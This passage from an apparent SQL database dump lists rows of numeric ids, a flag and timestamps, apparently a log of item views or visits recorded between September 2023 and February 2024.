08:06:37'),(85312,5353,1,'2023-09-17','2023-09-17 08:08:15'),(85313,5323,1,'2023-09-17','2023-09-17 09:57:09'),(85314,4944,1,'2023-09-17','2023-09-17 10:01:04'),(85315,89,1,'2023-09-17','2023-09-17 10:05:16'),(85316,4944,1,'2023-09-17','2023-09-17 10:05:31'),(85317,4960,1,'2023-09-17','2023-09-17 10:55:26'),(85318,4960,1,'2023-09-17','2023-09-17 10:56:33'),(85319,5128,1,'2023-09-17','2023-09-17 11:59:59'),(85320,4911,1,'2023-09-17','2023-09-17 12:04:17'),(85321,89,1,'2023-09-17','2023-09-17 12:22:32'),(85322,4911,1,'2023-09-17','2023-09-17 12:25:04'),(85323,4551,1,'2023-09-17','2023-09-17 12:29:07'),(85324,473,1,'2023-09-17','2023-09-17 12:56:01'),(85325,473,1,'2023-09-17','2023-09-17 12:56:55'),(85326,5163,1,'2023-09-17','2023-09-17 13:10:06'),(85327,1604,1,'2023-09-17','2023-09-17 13:25:23'),(85328,5163,1,'2023-09-17','2023-09-17 13:55:06'),(85329,4911,1,'2023-09-17','2023-09-17 14:07:48'),(85330,473,1,'2023-09-17','2023-09-17 14:15:02'),(85331,468,1,'2023-09-17','2023-09-17 14:30:33'),(85332,4960,1,'2023-09-17','2023-09-17 14:36:12'),(85333,1743,1,'2023-09-17','2023-09-17 14:37:20'),(85334,5163,1,'2023-09-17','2023-09-17 14:40:07'),(85335,4301,1,'2023-09-17','2023-09-17 14:42:01'),(85336,5131,1,'2023-09-17','2023-09-17 14:44:55'),(85337,2911,1,'2023-09-17','2023-09-17 14:50:31'),(85338,4517,1,'2023-09-17','2023-09-17 15:04:14'),(85339,4963,1,'2023-09-17','2023-09-17 15:21:57'),(85340,4988,1,'2023-09-17','2023-09-17 16:23:31'),(85341,1582,1,'2023-09-17','2023-09-17 16:32:22'),(85342,1745,1,'2023-09-17','2023-09-17 16:40:13'),(85343,5304,1,'2023-09-17','2023-09-17 17:07:35'),(85344,1596,1,'2023-09-17','2023-09-17 18:12:13'),(85345,80,1,'2023-09-17','2023-09-17 18:59:02'),(85346,5163,1,'2023-09-17','2023-09-17 19:03:09'),(85347,3124,1,'2023-09-17','2023-09-17 19:11:12'),(85348,91,1,'2023-09-17','2023-09-17 19:30:44'),(85349,5067,1,'2023-09-17','2023-09-17 19:32:54'),(85350,5067,1,'2023-09-17','2023-09-17 19:32:55'),(85351,3124,1,'2023-09-17','2023-09-17 19:33:41'),(85352,4759,1,'2023-09-17','2023-09-17 19:55:06'),(85353,4747,1,'2023-09-17','2023-09-17 21:25:09'),(85354,4768,1,'2023-09-17','2023-09-17 21:26:11'),(85355,4938,1,'2023-09-17','2023-09-17 21:34:49'),(85356,68,1,'2023-09-17','2023-09-17 21:35:41'),(85357,4938,1,'2023-09-17','2023-09-17 21:35:49'),(85358,4938,1,'2023-09-17','2023-09-17 21:36:39'),(85359,4938,1,'2023-09-17','2023-09-17 21:38:04'),(85360,4938,1,'2023-09-17','2023-09-17 21:38:31'),(85361,4341,1,'2023-09-17','2023-09-17 21:45:05'),(85362,4759,1,'2023-09-17','2023-09-17 22:20:26'),(85363,4960,1,'2023-09-17','2023-09-17 23:26:01'),(85364,2989,1,'2023-09-18','2023-09-18 00:57:10'),(85365,4960,1,'2023-09-18','2023-09-18 01:02:28'),(85366,2989,1,'2023-09-18','2023-09-18 01:37:13'),(85367,4938,1,'2023-09-18','2023-09-18 01:46:09'),(85368,4911,1,'2023-09-18','2023-09-18 01:55:10'),(85369,473,1,'2023-09-18','2023-09-18 02:04:20'),(85370,4703,1,'2023-09-18','2023-09-18 02:22:22'),(85371,468,1,'2023-09-18','2023-09-18 02:27:13'),(85372,5314,1,'2023-09-18','2023-09-18 02:38:44'),(85373,4768,1,'2023-09-18','2023-09-18 02:55:32'),(85374,4938,1,'2023-09-18','2023-09-18 03:21:45'),(85375,4753,1,'2023-09-18','2023-09-18 06:07:09'),(85376,4768,1,'2023-09-18','2023-09-18 06:15:35'),(85377,3691,1,'2023-09-18','2023-09-18 06:52:12'),(85378,4977,1,'2023-09-18','2023-09-18 09:00:48'),(85379,1544,1,'2023-09-18','2023-09-18 09:47:36'),(85380,4976,1,'2023-09-18','2023-09-18 09:52:08'),(85381,4911,1,'2023-09-18','2023-09-18 10:08:06'),(85382,80,1,'2023-09-18','2023-09-18 10:08:16'),(85383,80,1,'2023-09-18','2023-09-18 10:12:42'),(85384,76,1,'2023-09-18','2023-09-18 10:12:56'),(85385,1604,1,'2023-09-18','2023-09-18 10:18:19'),(85386,4608,1,'2023-09-18','2023-09-18 11:16:01'),(85387,1718,1,'2023-09-18','2023-09-18 11:16:43'),(85388,2904,1,'2023-09-18','2023-09-18 11:22:11'),(85389,1600,1,'2023-09-18','2023-09-18 11:23:37'),(85390,335,1,'2023-09-18','2023-09-18 11:41:13'),(85391,2154,1,'2023-09-18','2023-09-18 11:43:14'),(85392,3102,1,'2023-09-18','2023-09-18 11:47:19'),(85393,5356,1,'2023-09-18','2023-09-18 11:49:43'),(85394,5356,1,'2023-09-18','2023-09-18 11:50:49'),(85395,84,1,'2024-02-05','2024-02-05 00:48:44'),(85396,89,1,'2024-02-05','2024-02-05 00:49:24'),(85397,89,1,'2024-02-05','2024-02-05 00:50:13'),(85398,89,1,'2024-02-05','2024-02-05 00:51:15'),(85399,4301,1,'2024-02-05','2024-02-05 00:51:43'),(85400,4930,1,'2024-02-05','2024-02-05 00:52:20'),(85401,80,1,'2024-02-05','2024-02-05 01:00:11'),(85402,5050,1,'2024-02-05','2024-02-05 04:38:00'),(85403,3041,1,'2024-02-05','2024-02-05 09:17:01'),(85404,5337,1,'2024-02-05','2024-02-05 09:24:41'),(85405,1612,1,'2024-02-05','2024-02-05 10:49:23'),(85406,3774,1,'2024-02-05','2024-02-05 10:55:02'),(85407,5071,1,'2024-02-05','2024-02-05 12:21:56'),(85408,2156,1,'2024-02-05','2024-02-05 16:18:55'),(85409,473,1,'2024-02-05','2024-02-05 17:13:12'),(85410,1872,1,'2024-02-05','2024-02-05 17:13:13'),(85411,474,1,'2024-02-05','2024-02-05 17:20:27'),(85412,473,1,'2024-02-05','2024-02-05 17:20:27'),(85413,4944,1,'2024-02-06','2024-02-06 00:24:32'),(85414,4712,1,'2024-02-06','2024-02-06 01:07:25'),(85415,4963,1,'2024-02-06','2024-02-06 01:08:34'),(85416,2457,1,'2024-02-06','2024-02-06 01:08:45'),(85417,4938,1,'2024-02-06','2024-02-06 01:09:59'),(85418,2297,1,'2024-02-06','2024-02-06 03:43:50'),(85419,3005,1,'2024-02-06','2024-02-06 03:48:41'),(85420,3742,1,'2024-02-06','2024-02-06 04:47:13'),(85421,5028,1,'2024-02-06','2024-02-06 06:43:41'),(85422,4944,1,'2024-02-06','2024-02-06 07:19:06'),(85423,3102,1,'2024-02-06','2024-02-06 09:01:39'),(85424,2911,1,'2024-02-06','2024-02-06 09:52:51'),(85425,2410,1,'2024-02-06','2024-02-06 10:10:31'),(85426,4944,1,'2024-02-06','2024-02-06 10:37:10'),(85427,1872,1,'2024-02-06','2024-02-06 12:08:25'),(85428,473,1,'2024-02-06','2024-02-06 12:08:25'),(85429,80,1,'2024-02-06','2024-02-06 12:27:16'),(85430,91,1,'2024-02-06','2024-02-06 15:29:55'),(85431,4612,1,'2024-02-06','2024-02-06 15:30:33'),(85432,1614,1,'2024-02-06','2024-02-06 15:39:47'),(85433,5050,1,'2024-02-06','2024-02-06 15:55:20'),(85434,1751,1,'2024-02-06','2024-02-06 16:13:26'),(85435,2457,1,'2024-02-06','2024-02-06 18:02:02'),(85436,3069,1,'2024-02-06','2024-02-06 18:51:36'),(85437,80,1,'2024-02-06','2024-02-06 20:51:51'),(85438,2297,1,'2024-02-06','2024-02-06 23:13:04'),(85439,5116,1,'2024-02-07','2024-02-07 03:44:56'),(85440,5330,1,'2024-02-07','2024-02-07 04:45:48'),(85441,68,1,'2024-02-07','2024-02-07 05:01:57'),(85442,4944,1,'2024-02-07','2024-02-07 05:02:14'),(85443,2457,1,'2024-02-07','2024-02-07 05:51:49'),(85444,2457,1,'2024-02-07','2024-02-07 07:10:00'),(85445,3673,1,'2024-02-07','2024-02-07 07:15:55'),(85446,68,1,'2024-02-07','2024-02-07 09:11:58'),(85447,89,1,'2024-02-07','2024-02-07 09:12:21'),(85448,89,1,'2024-02-07','2024-02-07 09:13:16'),(85449,89,1,'2024-02-07','2024-02-07 09:13:23'),(85450,1612,1,'2024-02-07','2024-02-07 09:13:31'),(85451,5374,1,'2024-02-07','2024-02-07 09:14:34'),(85452,5058,1,'2024-02-07','2024-02-07 09:58:32'),(85453,2296,1,'2024-02-07','2024-02-07 09:59:47'),(85454,3092,1,'2024-02-07','2024-02-07 12:09:36'),(85455,1722,1,'2024-02-07','2024-02-07 12:46:04'),(85456,91,1,'2024-02-07','2024-02-07 12:48:28'),(85457,91,1,'2024-02-07','2024-02-07 12:48:52'),(85458,72,1,'2024-02-07','2024-02-07 12:49:02'),(85459,4612,1,'2024-02-07','2024-02-07 12:58:59'),(85460,4612,1,'2024-02-07','2024-02-07 13:00:37'),(85461,68,1,'2024-02-07','2024-02-07 15:23:06'),(85462,91,1,'2024-02-07','2024-02-07 15:23:40'),(85463,4612,1,'2024-02-07','2024-02-07 15:24:54'),(85464,91,1,'2024-02-07','2024-02-07 16:07:03'),(85465,4944,1,'2024-02-07','2024-02-07 19:02:08'),(85466,4944,1,'2024-02-07','2024-02-07 19:04:50'),(85467,4612,1,'2024-02-07','2024-02-07 20:17:49'),(85468,468,1,'2024-02-07','2024-02-07 22:21:25'),(85469,3267,1,'2024-02-07','2024-02-07 22:48:12'),(85470,1600,1,'2024-02-07','2024-02-07 23:39:48'),(85471,3066,1,'2024-02-08','2024-02-08 00:20:30'),(85472,3271,1,'2024-02-08','2024-02-08 01:36:27'),(85473,5163,1,'2024-02-08','2024-02-08 02:31:18'),(85474,4457,1,'2024-02-08','2024-02-08 04:24:32'),(85475,2904,1,'2024-02-08','2024-02-08 05:27:28'),(85476,4551,1,'2024-02-08','2024-02-08 06:11:33'),(85477,2658,1,'2024-02-08','2024-02-08 07:34:55'),(85478,2801,1,'2024-02-08','2024-02-08 08:10:45'),(85479,4938,1,'2024-02-08','2024-02-08 08:29:23'),(85480,469,1,'2024-02-08','2024-02-08 10:01:25'),(85481,4612,1,'2024-02-08','2024-02-08 12:12:33'),(85482,1592,1,'2024-02-08','2024-02-08 15:10:49'),(85483,76,1,'2024-02-08','2024-02-08 15:11:17'),(85484,84,1,'2024-02-08','2024-02-08 15:11:30'),(85485,68,1,'2024-02-08','2024-02-08 15:11:36'),(85486,4842,1,'2024-02-08','2024-02-08 15:12:44'),(85487,1592,1,'2024-02-08','2024-02-08 16:38:47'),(85488,5374,1,'2024-02-08','2024-02-08 17:28:35'),(85489,108,1,'2024-02-08','2024-02-08 18:25:59'),(85490,108,1,'2024-02-08','2024-02-08 18:30:39'),(85491,2457,1,'2024-02-08','2024-02-08 18:44:51'),(85492,479,1,'2024-02-08','2024-02-08 20:43:32'),(85493,68,1,'2024-02-08','2024-02-08 21:38:11'),(85494,1588,1,'2024-02-08','2024-02-08 21:52:04'),(85495,3004,1,'2024-02-08','2024-02-08 22:20:51'),(85496,2558,1,'2024-02-08','2024-02-08 22:52:41'),(85497,89,1,'2024-02-08','2024-02-08 23:14:46'),(85498,1713,1,'2024-02-09','2024-02-09 00:26:13'),(85499,1741,1,'2024-02-09','2024-02-09 02:16:32'),(85500,1612,1,'2024-02-09','2024-02-09 04:14:29'),(85501,2457,1,'2024-02-09','2024-02-09 05:02:40'),(85502,5028,1,'2024-02-09','2024-02-09 05:40:40'),(85503,1724,1,'2024-02-09','2024-02-09 06:55:58'),(85504,479,1,'2024-02-09','2024-02-09 08:10:25'),(85505,3090,1,'2024-02-09','2024-02-09 09:02:35'),(85506,5330,1,'2024-02-09','2024-02-09 10:05:17'),(85507,1592,1,'2024-02-09','2024-02-09 10:14:03'),(85508,4412,1,'2024-02-09','2024-02-09 10:14:35'),(85509,4404,1,'2024-02-09','2024-02-09 10:54:08'),(85510,5163,1,'2024-02-09','2024-02-09 12:13:21'),(85511,68,1,'2024-02-09','2024-02-09 12:14:17'),(85512,5163,1,'2024-02-09','2024-02-09 12:14:31'),(85513,1598,1,'2024-02-09','2024-02-09 12:18:48'),(85514,1598,1,'2024-02-09','2024-02-09 12:18:50'),(85515,5337,1,'2024-02-09','2024-02-09 13:08:55'),(85516,3430,1,'2024-02-09','2024-02-09 13:10:34'),(85517,2809,1,'2024-02-09','2024-02-09 13:33:30'),(85518,1614,1,'2024-02-09','2024-02-09 14:40:37'),(85519,4944,1,'2024-02-09','2024-02-09 14:56:34'),(85520,4517,1,'2024-02-09','2024-02-09 15:07:14'),(85521,5116,1,'2024-02-09','2024-02-09 15:10:29'),(85522,1699,1,'2024-02-09','2024-02-09 15:33:59'),(85523,5163,1,'2024-02-09','2024-02-09 16:10:36'),(85524,3263,1,'2024-02-09','2024-02-09 17:13:08'),(85525,4238,1,'2024-02-09','2024-02-09 20:08:15'),(85526,4944,1,'2024-02-10','2024-02-10 00:02:44'),(85527,5134,1,'2024-02-10','2024-02-10 02:06:54'),(85528,4753,1,'2024-02-10','2024-02-10 02:20:54'),(85529,3706,1,'2024-02-10','2024-02-10 03:35:54'),(85530,1699,1,'2024-02-10','2024-02-10 04:17:18'),(85531,2457,1,'2024-02-10','2024-02-10 05:08:19'),(85532,4612,1,'2024-02-10','2024-02-10 08:58:35'),(85533,3664,1,'2024-02-10','2024-02-10 10:03:00'),(85534,4551,1,'2024-02-10','2024-02-10 11:36:53'),(85535,4963,1,'2024-02-10','2024-02-10 11:40:41'),(85536,68,1,'2024-02-10','2024-02-10 13:52:12'),(85537,80,1,'2024-02-10','2024-02-10 13:57:24'),(85538,335,1,'2024-02-10','2024-02-10 14:00:49'),(85539,3273,1,'2024-02-10','2024-02-10 15:08:55'),(85540,4520,1,'2024-02-10','2024-02-10 15:53:24'),(85541,5163,1,'2024-02-10','2024-02-10 16:00:13'),(85542,1780,1,'2024-02-10','2024-02-10 16:10:00'),(85543,5163,1,'2024-02-10','2024-02-10 18:41:12'),(85544,3489,1,'2024-02-10','2024-02-10 20:08:55'),(85545,1737,1,'2024-02-10','2024-02-10 20:14:55'),(85546,4938,1,'2024-02-10','2024-02-10 21:15:52'),(85547,5163,1,'2024-02-10','2024-02-10 22:28:00'),(85548,5163,1,'2024-02-10','2024-02-10 22:47:16'),(85549,5163,1,'2024-02-10','2024-02-10 22:54:28'),(85550,5163,1,'2024-02-10','2024-02-10 23:10:29'),(85551,1592,1,'2024-02-11','2024-02-11 01:12:39'),(85552,4944,1,'2024-02-11','2024-02-11 01:29:11'),(85553,2904,1,'2024-02-11','2024-02-11 01:30:23'),(85554,4944,1,'2024-02-11','2024-02-11 01:31:11'),(85555,5163,1,'2024-02-11','2024-02-11 01:56:57'),(85556,5067,1,'2024-02-11','2024-02-11 02:26:26'),(85557,1596,1,'2024-02-11','2024-02-11 03:32:56'),(85558,5109,1,'2024-02-11','2024-02-11 04:28:01'),(85559,80,1,'2024-02-11','2024-02-11 07:04:14'),(85560,80,1,'2024-02-11','2024-02-11 07:04:33'),(85561,4428,1,'2024-02-11','2024-02-11 07:05:14'),(85562,3691,1,'2024-02-11','2024-02-11 07:21:28'),(85563,3691,1,'2024-02-11','2024-02-11 07:32:43'),(85564,467,1,'2024-02-11','2024-02-11 07:43:55'),(85565,1592,1,'2024-02-11','2024-02-11 09:55:32'),(85566,89,1,'2024-02-11','2024-02-11 11:35:43'),(85567,3738,1,'2024-02-11','2024-02-11 12:51:42'),(85568,1592,1,'2024-02-11','2024-02-11 17:40:18'),(85569,4551,1,'2024-02-11','2024-02-11 19:03:17'),(85570,5163,1,'2024-02-11','2024-02-11 19:06:56'),(85571,2159,1,'2024-02-12','2024-02-12 01:32:59'),(85572,4971,1,'2024-02-12','2024-02-12 04:43:28'),(85573,4966,1,'2024-02-12','2024-02-12 04:49:27'),(85574,4357,1,'2024-02-12','2024-02-12 05:00:40'),(85575,80,1,'2024-02-12','2024-02-12 06:15:50'),(85576,3109,1,'2024-02-12','2024-02-12 08:12:34'),(85577,474,1,'2024-02-12','2024-02-12 10:47:15'),(85578,473,1,'2024-02-12','2024-02-12 10:47:15'),(85579,473,1,'2024-02-12','2024-02-12 10:47:27'),(85580,474,1,'2024-02-12','2024-02-12 10:47:27'),(85581,474,1,'2024-02-12','2024-02-12 10:47:29'),(85582,473,1,'2024-02-12','2024-02-12 10:47:29'),(85583,68,1,'2024-02-12','2024-02-12 12:13:52'),(85584,108,1,'2024-02-12','2024-02-12 12:14:07'),(85585,5020,1,'2024-02-12','2024-02-12 15:02:19'),(85586,4870,1,'2024-02-12','2024-02-12 16:02:12'),(85587,1782,1,'2024-02-12','2024-02-12 16:24:07'),(85588,474,1,'2024-02-12','2024-02-12 16:58:34'),(85589,473,1,'2024-02-12','2024-02-12 16:58:34'),(85590,474,1,'2024-02-12','2024-02-12 16:58:42'),(85591,473,1,'2024-02-12','2024-02-12 16:58:42'),(85592,1877,1,'2024-02-12','2024-02-12 17:00:52'),(85593,473,1,'2024-02-12','2024-02-12 17:00:55'),(85594,473,1,'2024-02-12','2024-02-12 17:02:05'),(85595,1870,1,'2024-02-12','2024-02-12 17:02:05'),(85596,474,1,'2024-02-12','2024-02-12 17:05:58'),(85597,473,1,'2024-02-12','2024-02-12 17:05:59'),(85598,473,1,'2024-02-12','2024-02-12 17:06:38'),(85599,1870,1,'2024-02-12','2024-02-12 17:06:38'),(85600,2457,1,'2024-02-12','2024-02-12 17:38:26'),(85601,1877,1,'2024-02-12','2024-02-12 18:25:55'),(85602,473,1,'2024-02-12','2024-02-12 18:25:55'),(85603,5050,1,'2024-02-12','2024-02-12 19:43:41'),(85604,4357,1,'2024-02-12','2024-02-12 21:13:36'),(85605,2558,1,'2024-02-12','2024-02-12 21:41:01'),(85606,2558,1,'2024-02-12','2024-02-12 21:48:32'),(85607,2558,1,'2024-02-12','2024-02-12 21:48:50'),(85608,4944,1,'2024-02-12','2024-02-12 22:02:43'),(85609,4938,1,'2024-02-12','2024-02-12 23:26:14'),(85610,4938,1,'2024-02-12','2024-02-12 23:26:35'),(85611,4275,1,'2024-02-13','2024-02-13 00:18:59'),(85612,91,1,'2024-02-13','2024-02-13 01:27:18'),(85613,4637,1,'2024-02-13','2024-02-13 08:49:28'),(85614,470,1,'2024-02-13','2024-02-13 09:39:40'),(85615,68,1,'2024-02-13','2024-02-13 11:34:49'),(85616,91,1,'2024-02-13','2024-02-13 11:35:48'),(85617,5146,1,'2024-02-13','2024-02-13 11:36:28'),(85618,91,1,'2024-02-13','2024-02-13 11:36:37'),(85619,5071,1,'2024-02-13','2024-02-13 11:37:30'),(85620,91,1,'2024-02-13','2024-02-13 11:44:45'),(85621,5363,1,'2024-02-13','2024-02-13 11:45:11'),(85622,5363,1,'2024-02-13','2024-02-13 11:45:12'),(85623,68,1,'2024-02-13','2024-02-13 11:59:50'),(85624,5163,1,'2024-02-13','2024-02-13 12:42:30'),(85625,4944,1,'2024-02-13','2024-02-13 13:03:33'),(85626,2558,1,'2024-02-13','2024-02-13 13:40:37'),(85627,89,1,'2024-02-13','2024-02-13 13:50:44'),(85628,2154,1,'2024-02-13','2024-02-13 13:54:32'),(85629,2558,1,'2024-02-13','2024-02-13 14:14:22'),(85630,2558,1,'2024-02-13','2024-02-13 14:14:35'),(85631,1602,1,'2024-02-13','2024-02-13 17:35:42'),(85632,4911,1,'2024-02-13','2024-02-13 17:40:39'),(85633,5163,1,'2024-02-13','2024-02-13 17:50:58'),(85634,3781,1,'2024-02-13','2024-02-13 17:51:17'),(85635,4963,1,'2024-02-13','2024-02-13 18:05:48'),(85636,5337,1,'2024-02-13','2024-02-13 18:15:42'),(85637,4637,1,'2024-02-13','2024-02-13 18:35:37'),(85638,5163,1,'2024-02-13','2024-02-13 19:00:21'),(85639,1612,1,'2024-02-13','2024-02-13 19:05:08'),(85640,89,1,'2024-02-13','2024-02-13 20:00:58'),(85641,76,1,'2024-02-13','2024-02-13 20:01:25'),(85642,5116,1,'2024-02-13','2024-02-13 21:26:17'),(85643,1586,1,'2024-02-14','2024-02-14 02:03:52'),(85644,4966,1,'2024-02-14','2024-02-14 03:14:52'),(85645,1774,1,'2024-02-14','2024-02-14 04:44:54'),(85646,4840,1,'2024-02-14','2024-02-14 04:50:15'),(85647,3781,1,'2024-02-14','2024-02-14 07:30:16'),(85648,2178,1,'2024-02-14','2024-02-14 08:14:09'),(85649,1596,1,'2024-02-14','2024-02-14 10:14:21'),(85650,5163,1,'2024-02-14','2024-02-14 11:21:46'),(85651,5163,1,'2024-02-14','2024-02-14 11:39:14'),(85652,3069,1,'2024-02-14','2024-02-14 13:03:48'),(85653,469,1,'2024-02-14','2024-02-14 13:06:52'),(85654,1722,1,'2024-02-14','2024-02-14 13:49:01'),(85655,1709,1,'2024-02-14','2024-02-14 15:08:38'),(85656,1610,1,'2024-02-14','2024-02-14 17:04:59'),(85657,5080,1,'2024-02-14','2024-02-14 19:41:16'),(85658,4637,1,'2024-02-15','2024-02-15 00:41:32'),(85659,4944,1,'2024-02-15','2024-02-15 01:31:54'),(85660,3079,1,'2024-02-15','2024-02-15 01:37:32'),(85661,4966,1,'2024-02-15','2024-02-15 03:49:39'),(85662,1592,1,'2024-02-15','2024-02-15 07:44:25'),(85663,2457,1,'2024-02-15','2024-02-15 08:04:57'),(85664,72,1,'2024-02-15','2024-02-15 11:06:20'),(85665,487,1,'2024-02-15','2024-02-15 11:54:18'),(85666,488,1,'2024-02-15','2024-02-15 11:54:53'),(85667,5330,1,'2024-02-15','2024-02-15 11:55:09'),(85668,2165,1,'2024-02-15','2024-02-15 12:33:39'),(85669,4944,1,'2024-02-16','2024-02-16 02:23:35'),(85670,4938,1,'2024-02-16','2024-02-16 07:16:28'),(85671,3226,1,'2024-02-16','2024-02-16 08:15:07'),(85672,4845,1,'2024-02-16','2024-02-16 10:35:08'),(85673,1582,1,'2024-02-16','2024-02-16 13:31:10'),(85674,1614,1,'2024-02-16','2024-02-16 13:56:46'),(85675,4966,1,'2024-02-16','2024-02-16 14:12:34'),(85676,4966,1,'2024-02-16','2024-02-16 14:27:16'),(85677,5163,1,'2024-02-16','2024-02-16 15:16:07'),(85678,5334,1,'2024-02-16','2024-02-16 15:17:42'),(85679,5334,1,'2024-02-16','2024-02-16 15:17:46'),(85680,477,1,'2024-02-16','2024-02-16 16:06:10'),(85681,5116,1,'2024-02-16','2024-02-16 16:35:51'),(85682,4911,1,'2024-02-16','2024-02-16 16:48:38'),(85683,5163,1,'2024-02-16','2024-02-16 17:50:07'),(85684,3102,1,'2024-02-16','2024-02-16 18:01:08'),(85685,470,1,'2024-02-16','2024-02-16 18:46:07'),(85686,3489,1,'2024-02-16','2024-02-16 19:05:28'),(85687,4845,1,'2024-02-16','2024-02-16 19:50:17'),(85688,5046,1,'2024-02-16','2024-02-16 20:12:44'),(85689,1602,1,'2024-02-16','2024-02-16 20:24:10'),(85690,4911,1,'2024-02-16','2024-02-16 21:14:54'),(85691,4930,1,'2024-02-16','2024-02-16 21:52:52'),(85692,91,1,'2024-02-17','2024-02-17 01:25:53'),(85693,3706,1,'2024-02-17','2024-02-17 03:21:14'),(85694,4335,1,'2024-02-17','2024-02-17 04:50:04'),(85695,2457,1,'2024-02-17','2024-02-17 04:51:13'),(85696,470,1,'2024-02-17','2024-02-17 05:38:48'),(85697,4944,1,'2024-02-17','2024-02-17 07:38:51'),(85698,1734,1,'2024-02-17','2024-02-17 08:09:36'),(85699,4938,1,'2024-02-17','2024-02-17 08:31:45'),(85700,4938,1,'2024-02-17','2024-02-17 08:33:11'),(85701,1697,1,'2024-02-17','2024-02-17 09:05:49'),(85702,2964,1,'2024-02-17','2024-02-17 09:13:16'),(85703,3259,1,'2024-02-17','2024-02-17 13:46:05'),(85704,4938,1,'2024-02-17','2024-02-17 14:19:07'),(85705,5033,1,'2024-02-17','2024-02-17 14:54:23'),(85706,4587,1,'2024-02-17','2024-02-17 16:55:05'),(85707,470,1,'2024-02-17','2024-02-17 20:13:59'),(85708,1594,1,'2024-02-17','2024-02-17 21:16:48'),(85709,1596,1,'2024-02-17','2024-02-17 23:00:09'),(85710,4944,1,'2024-02-17','2024-02-17 23:58:49'),(85711,72,1,'2024-02-18','2024-02-18 00:43:32'),(85712,2457,1,'2024-02-18','2024-02-18 03:47:24'),(85713,4938,1,'2024-02-18','2024-02-18 04:14:21'),(85714,5163,1,'2024-02-18','2024-02-18 04:32:24'),(85715,4944,1,'2024-02-18','2024-02-18 05:44:22'),(85716,1592,1,'2024-02-18','2024-02-18 06:02:23'),(85717,4551,1,'2024-02-18','2024-02-18 06:32:41'),(85718,4508,1,'2024-02-18','2024-02-18 07:02:21'),(85719,470,1,'2024-02-18','2024-02-18 07:44:32'),(85720,335,1,'2024-02-18','2024-02-18 08:03:21'),(85721,1594,1,'2024-02-18','2024-02-18 08:42:46'),(85722,4608,1,'2024-02-18','2024-02-18 09:00:46'),(85723,4944,1,'2024-02-18','2024-02-18 09:11:27'),(85724,5163,1,'2024-02-18','2024-02-18 09:38:49'),(85725,4944,1,'2024-02-18','2024-02-18 10:45:26'),(85726,5163,1,'2024-02-18','2024-02-18 12:14:47'),(85727,1582,1,'2024-02-18','2024-02-18 12:32:46'),(85728,4428,1,'2024-02-18','2024-02-18 12:35:52'),(85729,4412,1,'2024-02-18','2024-02-18 15:03:24'),(85730,3430,1,'2024-02-18','2024-02-18 15:49:42'),(85731,470,1,'2024-02-18','2024-02-18 17:42:31'),(85732,2457,1,'2024-02-18','2024-02-18 19:10:26'),(85733,1730,1,'2024-02-18','2024-02-18 20:52:48'),(85734,3127,1,'2024-02-18','2024-02-18 21:34:47'),(85735,91,1,'2024-02-19','2024-02-19 00:46:43'),(85736,91,1,'2024-02-19','2024-02-19 01:00:48'),(85737,1582,1,'2024-02-19','2024-02-19 03:16:01'),(85738,1582,1,'2024-02-19','2024-02-19 03:16:01'),(85739,68,1,'2024-02-19','2024-02-19 04:27:10'),(85740,470,1,'2024-02-19','2024-02-19 05:36:04'),(85741,2419,1,'2024-02-19','2024-02-19 06:06:12'),(85742,4944,1,'2024-02-19','2024-02-19 06:14:32'),(85743,1772,1,'2024-02-19','2024-02-19 07:05:39'),(85744,1596,1,'2024-02-19','2024-02-19 07:39:04'),(85745,68,1,'2024-02-19','2024-02-19 08:44:24'),(85746,1586,1,'2024-02-19','2024-02-19 08:49:31'),(85747,3282,1,'2024-02-19','2024-02-19 09:08:18'),(85748,4440,1,'2024-02-19','2024-02-19 10:59:29'),(85749,91,1,'2024-02-19','2024-02-19 11:40:25'),(85750,91,1,'2024-02-19','2024-02-19 13:14:05'),(85751,91,1,'2024-02-19','2024-02-19 13:35:49'),(85752,91,1,'2024-02-19','2024-02-19 13:41:43'),(85753,1596,1,'2024-02-19','2024-02-19 13:46:27'),(85754,2989,1,'2024-02-19','2024-02-19 15:27:25'),(85755,4911,1,'2024-02-19','2024-02-19 16:41:40'),(85756,4489,1,'2024-02-19','2024-02-19 17:04:06'),(85757,4944,1,'2024-02-19','2024-02-19 17:50:57'),(85758,68,1,'2024-02-19','2024-02-19 17:57:41'),(85759,72,1,'2024-02-19','2024-02-19 18:01:55'),(85760,1594,1,'2024-02-19','2024-02-19 18:12:21'),(85761,72,1,'2024-02-19','2024-02-19 18:23:11'),(85762,72,1,'2024-02-19','2024-02-19 18:24:13'),(85763,91,1,'2024-02-19','2024-02-19 20:07:23'),(85764,72,1,'2024-02-19','2024-02-19 20:49:59'),(85765,5359,1,'2024-02-19','2024-02-19 20:52:49'),(85766,5356,1,'2024-02-19','2024-02-19 20:54:26'),(85767,5353,1,'2024-02-19','2024-02-19 20:55:22'),(85768,5356,1,'2024-02-19','2024-02-19 20:56:13'),(85769,5314,1,'2024-02-19','2024-02-19 20:58:46'),(85770,5310,1,'2024-02-19','2024-02-19 21:00:48'),(85771,5317,1,'2024-02-19','2024-02-19 21:13:11'),(85772,76,1,'2024-02-19','2024-02-19 21:17:52'),(85773,3060,1,'2024-02-19','2024-02-19 21:41:44'),(85774,74,1,'2024-02-20','2024-02-20 01:55:50'),(85775,1594,1,'2024-02-20','2024-02-20 02:09:53'),(85776,4517,1,'2024-02-20','2024-02-20 03:27:37'),(85777,4944,1,'2024-02-20','2024-02-20 04:08:26'),(85778,4911,1,'2024-02-20','2024-02-20 04:15:25'),(85779,1596,1,'2024-02-20','2024-02-20 07:50:09'),(85780,4960,1,'2024-02-20','2024-02-20 07:52:43'),(85781,5330,1,'2024-02-20','2024-02-20 08:18:44'),(85782,4870,1,'2024-02-20','2024-02-20 09:51:25'),(85783,470,1,'2024-02-20','2024-02-20 12:41:55'),(85784,4930,1,'2024-02-20','2024-02-20 12:51:08'),(85785,5163,1,'2024-02-20','2024-02-20 14:05:38'),(85786,4966,1,'2024-02-20','2024-02-20 14:27:24'),(85787,4930,1,'2024-02-20','2024-02-20 16:23:19'),(85788,4944,1,'2024-02-20','2024-02-20 16:35:08'),(85789,1582,1,'2024-02-20','2024-02-20 17:01:53'),(85790,4944,1,'2024-02-20','2024-02-20 17:26:07'),(85791,1614,1,'2024-02-20','2024-02-20 18:36:10'),(85792,2457,1,'2024-02-20','2024-02-20 19:19:52'),(85793,1596,1,'2024-02-20','2024-02-20 19:37:25'),(85794,1596,1,'2024-02-20','2024-02-20 20:21:53'),(85795,68,1,'2024-02-20','2024-02-20 21:17:03'),(85796,68,1,'2024-02-20','2024-02-20 22:06:16'),(85797,4542,1,'2024-02-20','2024-02-20 23:19:27'),(85798,4966,1,'2024-02-20','2024-02-20 